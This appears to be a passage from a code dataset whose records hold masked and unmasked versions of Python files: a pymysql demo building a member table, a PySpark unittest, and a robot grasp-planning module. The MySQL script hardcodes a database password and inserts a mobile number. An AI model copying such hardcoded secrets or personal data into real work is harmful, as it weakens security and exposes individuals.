VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',\n\t\t\t\tPRIMARY KEY (MEMBER_ID)\n\t\t\t)\n\t\t\tCOMMENT='会员信息表'\n\t\t\tCOLLATE='utf8_general_ci'\n\t\t\tENGINE=InnoDB\n\t\"\"\"\n cur1.execute(sql)\n print('createTabl', cur1)\n\n\ndef selectTable(db):\n cur1 = db.cursor()\n cur1.execute(\n 'select member_name,MEMBER_CODE,member_id from python_demo limit 10')\n data = cur1.fetchall()\n for index, item in enumerate(data):\n print(index, sep=' ', end=' ')\n for index2, item2 in enumerate(item):\n print(item2, sep=' ', end=' ')\n print('')\n\n\ndef insertTable(db):\n cur1 = db.cursor()\n cur1.execute(\n \"INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)\"\n )\n\n\ndb = pymysql.connect(host='127.0.0.1', user='pu3147', password='1qaz@WSX',\n database='demo', port=3306, charset='UTF8')\ndropTable(db)\ncreateTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ntesteSelect(db)\nselectTable(db)\ndb.close()\n",
"step-5": "import pymysql\n\n\n\ndef testeSelect(db):\n\t#创建查询游标\n\tcur1 = db.cursor()\n\n\t# 使用 execute() 方法执行 SQL 查询 \n\tcur1.execute(\"SELECT VERSION()\")\n\t \n\t# 使用 fetchone() 方法获取单条数据.\n\tdata = cur1.fetchone()\n\tprint(dir(data))\n\tprint (\"cur1 : %s \" % cur1) \n\tprint (\"Database version : %s \" % data)\n\ndef dropTable(db):\n\t#创建查询游标\n\tcur1 = db.cursor()\n\n\tcur1.execute(\"drop table if exists python_demo\")\n\tprint('dropTable',cur1)\n\t \n\ndef createTable(db):\n\t#创建查询游标\n\tcur1 = db.cursor()\n\n\tsql = '''\n\t\t\tCREATE TABLE IF NOT EXISTS python_demo (\n\t\t\t\tMEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',\n\t\t\t\tMEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',\n\t\t\t\tMEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',\n\t\t\t\tMEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',\n\t\t\t\tCOMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',\n\t\t\t\tREG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tREG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',\n\t\t\t\tREGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',\n\t\t\t\tREG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',\n\t\t\t\tJUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',\n\t\t\t\tBUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',\n\t\t\t\tCOM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',\n\t\t\t\tCOM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',\n\t\t\t\tPERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',\n\t\t\t\tZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',\n\t\t\t\tCON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',\n\t\t\t\tCON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',\n\t\t\t\tCON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',\n\t\t\t\tCON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',\n\t\t\t\tCON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',\n\t\t\t\tCON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',\n\t\t\t\tCON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',\n\t\t\t\tCON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',\n\t\t\t\tCON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',\n\t\t\t\tTHERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',\n\t\t\t\tBIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',\n\t\t\t\tBIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',\n\t\t\t\tBIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',\n\t\t\t\tTAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',\n\t\t\t\tTAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',\n\t\t\t\tTAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',\n\t\t\t\tORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',\n\t\t\t\tORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',\n\t\t\t\tORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',\n\t\t\t\tBANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',\n\t\t\t\tBANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',\n\t\t\t\tBANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',\n\t\t\t\tBANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',\n\t\t\t\tBANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',\n\t\t\t\tBANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',\n\t\t\t\tINVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',\n\t\t\t\tINVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',\n\t\t\t\tINVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',\n\t\t\t\tAPPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',\n\t\t\t\tBUYER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '买家标识',\n\t\t\t\tSELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',\n\t\t\t\tTHIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',\n\t\t\t\tMAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',\n\t\t\t\tMDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',\n\t\t\t\tERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',\n\t\t\t\tREG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',\n\t\t\t\tSTATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',\n\t\t\t\tAUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',\n\t\t\t\tAUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',\n\t\t\t\tAUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',\n\t\t\t\tAUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',\n\t\t\t\tMDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',\n\t\t\t\tMDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',\n\t\t\t\tMDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',\n\t\t\t\tMDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',\n\t\t\t\tMEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',\n\t\t\t\tCHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',\n\t\t\t\tALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',\n\t\t\t\tLANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',\n\t\t\t\tCREATE_USER INT(20) NOT NULL COMMENT '创建者',\n\t\t\t\tCREATE_DATE DATETIME NOT NULL COMMENT '创建时间',\n\t\t\t\tUPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',\n\t\t\t\tUPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',\n\t\t\t\tDELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',\n\t\t\t\tDELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',\n\t\t\t\tBUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',\n\t\t\t\tAUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',\n\t\t\t\tAUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',\n\t\t\t\tSELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',\n\t\t\t\tSELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',\n\t\t\t\tSELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',\n\t\t\t\tIS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',\n\t\t\t\tINVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',\n\t\t\t\tINVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',\n\t\t\t\tPRIMARY KEY (MEMBER_ID)\n\t\t\t)\n\t\t\tCOMMENT='会员信息表'\n\t\t\tCOLLATE='utf8_general_ci'\n\t\t\tENGINE=InnoDB\n\t'''\n\n\tcur1.execute(sql)\n\t\n\tprint('createTabl',cur1)\n\ndef selectTable(db):\n\t#创建查询游标\n\tcur1 = db.cursor()\n\n\tcur1.execute(\"select member_name,MEMBER_CODE,member_id from python_demo limit 10\")\n\n\t# 使用 fetchall() 接收全部的返回结果行\n\tdata = cur1.fetchall()\n\tfor index,item in enumerate(data):\n\t\tprint(index,sep=' ', end=' ')\n\t\tfor index2,item2 in enumerate(item):\n\t\t\tprint(item2,sep=' ', end=' ')\n\t\tprint(\"\")\n\ndef insertTable(db):\n\t#创建查询游标\n\tcur1 = db.cursor()\n\n\tcur1.execute(\"INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)\")\n\n\t# 使用 fetchall() 接收全部的返回结果行\n\t#data = cur1.rowcount()\n\n\t#print('insertTable',data)\n\n# 打开数据库连接\ndb = pymysql.connect(host='127.0.0.1',user='pu3147',\n\tpassword='1qaz@WSX',database='demo',port=3306,charset='UTF8')\n\n\ndropTable(db)\ncreateTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ntesteSelect(db)\nselectTable(db)\n\n# 关闭数据库连接\ndb.close()\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
#!/usr/bin/env python
import unittest
from pyspark import SparkConf, SparkContext
from mmtfPyspark.io.mmtfReader import download_mmtf_files
from mmtfPyspark.datasets import secondaryStructureExtractor
from mmtfPyspark.filters import ContainsLProteinChain
from mmtfPyspark.mappers import StructureToPolymerChains
class SecondaryStructureExtractorTest(unittest.TestCase):
def setUp(self):
conf = SparkConf().setMaster("local[*]").setAppName('secondaryStructureExtractorTest')
self.sc = SparkContext(conf=conf)
pdbIds = ["1STP","4HHB"]
self.pdb = download_mmtf_files(pdbIds,self.sc)
def test1(self):
pdb = self.pdb.filter(ContainsLProteinChain()) \
.flatMap(StructureToPolymerChains()) \
.filter(ContainsLProteinChain())
seq = secondaryStructureExtractor.get_dataset(pdb)
self.assertTrue(seq.count() == 5)
def tearDown(self):
self.sc.stop()
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "480e6ae9eee70b2da58ca5624a43d8f5dcae1d33",
"index": 1207,
"step-1": "<mask token>\n\n\nclass SecondaryStructureExtractorTest(unittest.TestCase):\n <mask token>\n\n def test1(self):\n pdb = self.pdb.filter(ContainsLProteinChain()).flatMap(\n StructureToPolymerChains()).filter(ContainsLProteinChain())\n seq = secondaryStructureExtractor.get_dataset(pdb)\n self.assertTrue(seq.count() == 5)\n\n def tearDown(self):\n self.sc.stop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SecondaryStructureExtractorTest(unittest.TestCase):\n\n def setUp(self):\n conf = SparkConf().setMaster('local[*]').setAppName(\n 'secondaryStructureExtractorTest')\n self.sc = SparkContext(conf=conf)\n pdbIds = ['1STP', '4HHB']\n self.pdb = download_mmtf_files(pdbIds, self.sc)\n\n def test1(self):\n pdb = self.pdb.filter(ContainsLProteinChain()).flatMap(\n StructureToPolymerChains()).filter(ContainsLProteinChain())\n seq = secondaryStructureExtractor.get_dataset(pdb)\n self.assertTrue(seq.count() == 5)\n\n def tearDown(self):\n self.sc.stop()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SecondaryStructureExtractorTest(unittest.TestCase):\n\n def setUp(self):\n conf = SparkConf().setMaster('local[*]').setAppName(\n 'secondaryStructureExtractorTest')\n self.sc = SparkContext(conf=conf)\n pdbIds = ['1STP', '4HHB']\n self.pdb = download_mmtf_files(pdbIds, self.sc)\n\n def test1(self):\n pdb = self.pdb.filter(ContainsLProteinChain()).flatMap(\n StructureToPolymerChains()).filter(ContainsLProteinChain())\n seq = secondaryStructureExtractor.get_dataset(pdb)\n self.assertTrue(seq.count() == 5)\n\n def tearDown(self):\n self.sc.stop()\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nfrom pyspark import SparkConf, SparkContext\nfrom mmtfPyspark.io.mmtfReader import download_mmtf_files\nfrom mmtfPyspark.datasets import secondaryStructureExtractor\nfrom mmtfPyspark.filters import ContainsLProteinChain\nfrom mmtfPyspark.mappers import StructureToPolymerChains\n\n\nclass SecondaryStructureExtractorTest(unittest.TestCase):\n\n def setUp(self):\n conf = SparkConf().setMaster('local[*]').setAppName(\n 'secondaryStructureExtractorTest')\n self.sc = SparkContext(conf=conf)\n pdbIds = ['1STP', '4HHB']\n self.pdb = download_mmtf_files(pdbIds, self.sc)\n\n def test1(self):\n pdb = self.pdb.filter(ContainsLProteinChain()).flatMap(\n StructureToPolymerChains()).filter(ContainsLProteinChain())\n seq = secondaryStructureExtractor.get_dataset(pdb)\n self.assertTrue(seq.count() == 5)\n\n def tearDown(self):\n self.sc.stop()\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "#!/usr/bin/env python\n\nimport unittest\nfrom pyspark import SparkConf, SparkContext\nfrom mmtfPyspark.io.mmtfReader import download_mmtf_files\nfrom mmtfPyspark.datasets import secondaryStructureExtractor\nfrom mmtfPyspark.filters import ContainsLProteinChain\nfrom mmtfPyspark.mappers import StructureToPolymerChains\n\n\nclass SecondaryStructureExtractorTest(unittest.TestCase):\n\n def setUp(self):\n conf = SparkConf().setMaster(\"local[*]\").setAppName('secondaryStructureExtractorTest')\n self.sc = SparkContext(conf=conf)\n\n pdbIds = [\"1STP\",\"4HHB\"]\n self.pdb = download_mmtf_files(pdbIds,self.sc)\n\n\n def test1(self):\n pdb = self.pdb.filter(ContainsLProteinChain()) \\\n .flatMap(StructureToPolymerChains()) \\\n .filter(ContainsLProteinChain())\n\n seq = secondaryStructureExtractor.get_dataset(pdb)\n\n self.assertTrue(seq.count() == 5)\n\n\n def tearDown(self):\n self.sc.stop()\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import math
import numpy as np
import basis.robot_math as rm
import grasping.annotation.utils as gu
from scipy.spatial import cKDTree
def plan_contact_pairs(objcm,
max_samples=100,
min_dist_between_sampled_contact_points=.005,
angle_between_contact_normals=math.radians(160),
toggle_sampled_points=False):
"""
find the contact pairs using rayshooting
the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint
:param angle_between_contact_normals:
:param toggle_sampled_points
:return: [[contact_p0, contact_p1], ...]
author: weiwei
date: 20190805, 20210504
"""
contact_points, face_ids = objcm.sample_surface(nsample=max_samples,
radius=min_dist_between_sampled_contact_points / 2)
contact_normals = objcm.objtrm.face_normals[face_ids]
contact_pairs = []
tree = cKDTree(contact_points)
near_history = np.array([0] * len(contact_points), dtype=bool)
for i, contact_p0 in enumerate(contact_points):
if near_history[i]: # if the point was previous near to some points, ignore
continue
contact_n0 = contact_normals[i]
hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * .001, contact_p0 - contact_n0 * 100)
if len(hit_points) > 0:
for contact_p1, contact_n1 in zip(hit_points, hit_normals):
if np.dot(contact_n0, contact_n1) < -math.cos(angle_between_contact_normals):
near_points_indices = tree.query_ball_point(contact_p1, min_dist_between_sampled_contact_points)
if len(near_points_indices):
for npi in near_points_indices:
if np.dot(contact_normals[npi], contact_n1) > math.cos(angle_between_contact_normals):
near_history[npi] = True
contact_pairs.append([[contact_p0, contact_n0], [contact_p1, contact_n1]])
if toggle_sampled_points:
return contact_pairs, contact_points
return contact_pairs
def plan_grasps(hnd_s,
objcm,
angle_between_contact_normals=math.radians(160),
openning_direction = 'loc_x',
rotation_interval=math.radians(22.5),
max_samples=100,
min_dist_between_sampled_contact_points=.005,
contact_offset=.002):
"""
:param objcm:
:param hnd_s:
:param angle_between_contact_normals:
:param openning_direction: 'loc_x' or 'loc_y' depending on gripper types
:param rotation_granularity:
:param max_samples:
:param min_dist_between_sampled_contact_points:
:param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces
:return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]
"""
contact_pairs = plan_contact_pairs(objcm,
max_samples=max_samples,
min_dist_between_sampled_contact_points=min_dist_between_sampled_contact_points,
angle_between_contact_normals=angle_between_contact_normals)
grasp_info_list = []
import modeling.geometric_model as gm
for i, cp in enumerate(contact_pairs):
print(f"{i} of {len(contact_pairs)} done!")
contact_p0, contact_n0 = cp[0]
contact_p1, contact_n1 = cp[1]
contact_center = (contact_p0 + contact_p1) / 2
jaw_width = np.linalg.norm(contact_p0 - contact_p1) + contact_offset * 2
if jaw_width > hnd_s.jawwidth_rng[1]:
continue
if openning_direction == 'loc_x':
jaw_center_x = contact_n0
jaw_center_z = rm.orthogonal_vector(contact_n0)
jaw_center_y = np.cross(jaw_center_z, jaw_center_x)
elif openning_direction == 'loc_y':
jaw_center_y = contact_n0
jaw_center_z = rm.orthogonal_vector(contact_n0)
else:
raise ValueError("Openning direction must be loc_x or loc_y!")
grasp_info_list += gu.define_grasp_with_rotation(hnd_s,
objcm,
gl_jaw_center_pos=contact_center,
gl_jaw_center_z=jaw_center_z,
gl_jaw_center_y=jaw_center_y,
jaw_width=jaw_width,
gl_rotation_ax=contact_n0,
rotation_interval=rotation_interval,
toggle_flip=True)
return grasp_info_list
def write_pickle_file(objcm_name, grasp_info_list, root=None, file_name='preannotated_grasps.pickle', append=False):
if root is None:
root = './'
gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=file_name, append=append)
def load_pickle_file(objcm_name, root=None, file_name='preannotated_grasps.pickle'):
if root is None:
root = './'
return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)
if __name__ == '__main__':
import os
import basis
import robot_sim.end_effectors.grippers.xarm_gripper.xarm_gripper as xag
import modeling.collision_model as cm
import visualization.panda.world as wd
base = wd.World(cam_pos=[.5, .5, .3], lookat_pos=[0, 0, 0])
gripper_s = xag.XArmGripper(enable_cc=True)
objpath = os.path.join(basis.__path__[0], 'objects', 'block.stl')
objcm = cm.CollisionModel(objpath)
objcm.attach_to(base)
objcm.show_localframe()
grasp_info_list = plan_grasps(gripper_s, objcm, min_dist_between_sampled_contact_points=.02)
for grasp_info in grasp_info_list:
jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos, hnd_rotmat = grasp_info
gic = gripper_s.copy()
gic.fix_to(hnd_pos, hnd_rotmat)
gic.jaw_to(jaw_width)
print(hnd_pos, hnd_rotmat)
gic.gen_meshmodel().attach_to(base)
base.run()
|
normal
|
{
"blob_id": "738e6d4d608aa977094420a432cbd8a05ea8a1b5",
"index": 4384,
"step-1": "<mask token>\n\n\ndef plan_grasps(hnd_s, objcm, angle_between_contact_normals=math.radians(\n 160), openning_direction='loc_x', rotation_interval=math.radians(22.5),\n max_samples=100, min_dist_between_sampled_contact_points=0.005,\n contact_offset=0.002):\n \"\"\"\n\n :param objcm:\n :param hnd_s:\n :param angle_between_contact_normals:\n :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types\n :param rotation_granularity:\n :param max_samples:\n :param min_dist_between_sampled_contact_points:\n :param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces\n :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]\n \"\"\"\n contact_pairs = plan_contact_pairs(objcm, max_samples=max_samples,\n min_dist_between_sampled_contact_points=\n min_dist_between_sampled_contact_points,\n angle_between_contact_normals=angle_between_contact_normals)\n grasp_info_list = []\n import modeling.geometric_model as gm\n for i, cp in enumerate(contact_pairs):\n print(f'{i} of {len(contact_pairs)} done!')\n contact_p0, contact_n0 = cp[0]\n contact_p1, contact_n1 = cp[1]\n contact_center = (contact_p0 + contact_p1) / 2\n jaw_width = np.linalg.norm(contact_p0 - contact_p1\n ) + contact_offset * 2\n if jaw_width > hnd_s.jawwidth_rng[1]:\n continue\n if openning_direction == 'loc_x':\n jaw_center_x = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n jaw_center_y = np.cross(jaw_center_z, jaw_center_x)\n elif openning_direction == 'loc_y':\n jaw_center_y = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n else:\n raise ValueError('Openning direction must be loc_x or loc_y!')\n grasp_info_list += gu.define_grasp_with_rotation(hnd_s, objcm,\n gl_jaw_center_pos=contact_center, gl_jaw_center_z=jaw_center_z,\n gl_jaw_center_y=jaw_center_y, jaw_width=jaw_width,\n gl_rotation_ax=contact_n0, rotation_interval=rotation_interval,\n toggle_flip=True)\n return grasp_info_list\n\n\ndef write_pickle_file(objcm_name, grasp_info_list, root=None, file_name=\n 'preannotated_grasps.pickle', append=False):\n if root is None:\n root = './'\n gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=\n file_name, append=append)\n\n\ndef load_pickle_file(objcm_name, root=None, file_name=\n 'preannotated_grasps.pickle'):\n if root is None:\n root = './'\n return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef plan_contact_pairs(objcm, max_samples=100,\n min_dist_between_sampled_contact_points=0.005,\n angle_between_contact_normals=math.radians(160), toggle_sampled_points=\n False):\n \"\"\"\n find the contact pairs using rayshooting\n the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint\n :param angle_between_contact_normals:\n :param toggle_sampled_points\n :return: [[contact_p0, contact_p1], ...]\n author: weiwei\n date: 20190805, 20210504\n \"\"\"\n contact_points, face_ids = objcm.sample_surface(nsample=max_samples,\n radius=min_dist_between_sampled_contact_points / 2)\n contact_normals = objcm.objtrm.face_normals[face_ids]\n contact_pairs = []\n tree = cKDTree(contact_points)\n near_history = np.array([0] * len(contact_points), dtype=bool)\n for i, contact_p0 in enumerate(contact_points):\n if near_history[i]:\n continue\n contact_n0 = contact_normals[i]\n hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * \n 0.001, contact_p0 - contact_n0 * 100)\n if len(hit_points) > 0:\n for contact_p1, contact_n1 in zip(hit_points, hit_normals):\n if np.dot(contact_n0, contact_n1) < -math.cos(\n angle_between_contact_normals):\n near_points_indices = tree.query_ball_point(contact_p1,\n min_dist_between_sampled_contact_points)\n if len(near_points_indices):\n for npi in near_points_indices:\n if np.dot(contact_normals[npi], contact_n1\n ) > math.cos(angle_between_contact_normals):\n near_history[npi] = True\n contact_pairs.append([[contact_p0, contact_n0], [\n contact_p1, contact_n1]])\n if toggle_sampled_points:\n return contact_pairs, contact_points\n return contact_pairs\n\n\ndef 